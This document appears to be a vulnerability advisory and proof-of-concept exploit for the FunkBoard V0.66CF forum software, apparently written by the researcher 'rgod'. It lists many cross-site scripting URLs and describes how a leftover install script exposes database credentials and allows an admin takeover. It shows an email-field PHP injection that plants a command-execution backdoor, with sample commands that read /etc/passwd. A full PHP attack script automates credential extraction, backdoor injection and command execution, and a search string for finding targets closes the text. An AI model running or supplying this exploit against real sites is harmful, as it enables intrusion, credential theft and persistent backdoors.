FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure & board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername="> http://[target]/[path_to_funkboard]/editpost.php?fbpassword="> http://[target]/[path_to_funkboard]/prefs.php?fbpassword="> http://[target]/[path_to_funkboard]/prefs.php?fbusername="> http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername="> http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword="> http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject="> http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername="> http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword="> http://[target]/[path_to_funkboard]/profile.php?fbusername="> http://[target]/[path_to_funkboard]/profile.php?fbpassword="> http://[target]/[path_to_funkboard]/register.php?fbusername="> http://[target]/[path_to_funkboard]/register.php?fmail="> http://[target]/[path_to_funkboard]/register.php?www="> http://[target]/[path_to_funkboard]/register.php?icq="> http://[target]/[path_to_funkboard]/register.php?yim="> http://[target]/[path_to_funkboard]/register.php?location="> http://[target]/[path_to_funkboard]/register.php?sex="> http://[target]/[path_to_funkboard]/register.php?interebbies="> http://[target]/[path_to_funkboard]/register.php?sig= http://[target]/[path_to_funkboard]/register.php?aim="> path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username & password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username & password ... Then, the script let the user proceed to the next page, where he can reset funkboard administator username & password. Now the script faults, because some tables exist, etc. So user can go back and setting a new database name for installation, guessing among other installations on the server... Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. remote code execution: look at this code in mysql_install.php : $infoout = ""; echo "Writing Config File
"; unlink ("../info.php"); $outname="../info.php"; $file = fopen($outname,"w+"); fputs($file, $infoout); fclose($file); clearly, you can inject php code, example: go to http://[target]/[path]/admin/mysql_install.php in email field (not checked) write: email@domain.com'; error_reporting(0); system($HTTP_GET_VARS[command]); echo ' press continue... now look at info.php, the config file in main directory, you have: so, you have a backdoor on target system... you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories... http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file this is my proof of concept exploit: FunkBoard V0.66CF remote commands execution

FunkBoard V0.66CF (possibly prior versions) remote commands execution

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path (ex: /funkboard/ or /forum/ just /)

specify a port other than 80 (default value)

a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file

send exploit through an HTTP proxy (ip:port)

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; if (($path<>'') and ($host<>'') and ($command<>'')) { if ($port=='') {$port=80;} if ($proxy=='') {$packet="GET ".$path."admin/mysql_install.php HTTP/1.1\r\n";} else { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...
'; die; } else {$packet="GET http://".$host.$path."admin/mysql_install.php HTTP/1.0\r\n";} } $packet.="Accept: *//*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); if ($proxy=='') {$fp=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $fp=fsockopen($parts[0],$parts[1]); if (!$fp) { echo 'No response from proxy...'; die; } } fputs($fp,$packet); $data=''; if ($proxy=='') { while (!feof($fp)) { $data.=fgets($fp); } } else { $data=''; while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data))) { $data.=fread($fp,1); } } fclose($fp); show($data); echo '
'; if (!eregi('HTTP/1.1 200 OK',$data)) {echo 'Error...see packet dump'; die;} //************************extract values from form******************************** $parts=explode('value="',$data); for ($i=0; $i<=count($parts)-1; $i++) { $p[$i]=explode('"',$parts[$i]); if ($i==2) {$server1=$p[$i][0];} if ($i==3) {$dbname1=$p[$i][0];} if ($i==4) {$dbuser1=$p[$i][0];} if ($i==5) {$dbpass1=$p[$i][0];} if ($i==6) { if (eregi('CHECKED',$parts[$i])) { $dbtype1='mysql';} else { $dbtype1='postgres';} } if ($i==8) {$e=$p[$i][0];} } echo 'Server: '.$server1.'
'; echo 'DbName: '.$dbname1.'
'; echo 'DbUser: '.$dbuser1.'
'; echo 'DbPass: '.$dbpass1.'
'; echo 'DbType: '.$dbtype1.'
'; echo 'Email : '.$e.'
'; $data="server1=".urlencode($server1)."&dbname1=".urlencode($dbname1)."&dbuser1="; $data.=urlencode($dbuser1)."&dbpass1=".urlencode($dbpass1)."&dbtype1=".urlencode($dbtype1)."&email1=".urlencode($e); $data.=urlencode("'; error_reporting(0); system(".'$HTTP_GET_VARS[command]'."); echo'"); $data.="&action=Continue2"; if ($proxy=='') {$packet="POST ".$path."admin/mysql_install.php HTTP/1.1\r\n";} else { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...
'; die; } else {$packet="POST http://".$host.$path."admin/mysql_install.php HTTP/1.1\r\n";} } $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"; $packet.="Referer: http://".$host.":".$port.$path."mysql_install.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; show($packet); if ($proxy=='') {$fp=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $fp=fsockopen($parts[0],$parts[1]); if (!$fp) { echo 'No response from proxy...'; die; } } fputs($fp,$packet); $data=''; while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data))) { $data.=fread($fp,1); } fclose($fp); show($data); if ($proxy=='') {$packet="GET ".$path."info.php?command=".urlencode($command)." HTTP/1.1\r\n";} else { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...
'; die; } else {$packet="GET http://".$host.$path."info.php?command=".urlencode($command)." HTTP/1.1\r\n";} } $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); if ($proxy=='') {$fp=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $fp=fsockopen($parts[0],$parts[1]); if (!$fp) { echo 'No response from proxy...'; die; } } fputs($fp,$packet); $data=''; if ($proxy=='') { $data=''; while (!feof($fp)) { $data.=fgets($fp); } } else { $data=''; while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data))) { $data.=fread($fp,1); } } fclose($fp); if (eregi('HTTP/1.1 200 OK',$data)) {echo 'Exploit sent...
If FunkBoard is vulnerable
'; echo 'you will see '.htmlentities($command).' output inside HTML...

'; } else {echo 'Error, see output...';} echo nl2br(htmlentities($data)); $data="server1=".urlencode($server1)."&dbname1=".urlencode($dbname1)."&dbuser1="; $data.=urlencode($dbuser1)."&dbpass1=".urlencode($dbpass1)."&dbtype1=".urlencode($dbtype1)."&email1=".urlencode($e); $data.="&action=Continue2"; if ($proxy=='') {$packet="POST ".$path."admin/mysql_install.php HTTP/1.1\r\n";} else { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...
'; die; } else {$packet="POST http://".$host.$path."admin/mysql_install.php HTTP/1.1\r\n";} } $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, *//*\r\n"; $packet.="Referer: http://".$host.":".$port.$path."mysql_install.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; show($packet); if ($proxy=='') {$fp=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $fp=fsockopen($parts[0],$parts[1]); if (!$fp) { echo 'No response from proxy...'; die; } } fputs($fp,$packet); $data=''; while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data))) { $data.=fread($fp,1); } fclose($fp); show($data); } ?> googledork: "Powered by FunkBoard" rgod site: http://rgod.altervista.org mail: retrogod@aliceposta.it